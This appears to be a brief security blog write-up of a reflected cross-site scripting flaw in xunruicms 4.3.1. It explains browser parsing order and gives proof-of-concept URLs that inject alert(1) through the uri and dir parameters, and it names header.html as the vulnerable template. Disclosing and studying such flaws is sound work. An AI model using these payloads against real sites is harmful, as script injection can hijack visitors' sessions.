xunruicms 4.3.1 xss
Contents
Description
url : index.php?m=s404&uri=llfam
The url we visited can be a parameter to function dr_pc_or_mobile().
But single quote '
will be url encoded.
How to expolit ? First , we should learn how browser parser work.
ref : http://bobao.360.cn/learning/detail/292.html
Example
browser parser : html、url、javascript
- html -> url -> javascript
1 | <a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)">llfam</a> |
html parser
1 | // before |
url parser
1 | // before |
javascript parser
1 | // before |
poc
Here , The parsing order is same as the example.
url : index.php?m=s404&uri=llfam%27)%3balert(1)%3balert(%272
Vuln is in header.html , so …
1 | http://cms.test/index.php?c=category&id=llfam&dir=llfam%27)%3balert(1)%3balert(%272 |
But , it is hard to exploit。
Author: ll
Link: http://yoursite.com/2019/09/09/xunruicms_4.3.1_xss/
License: 知识共享署名-非商业性使用 4.0 国际许可协议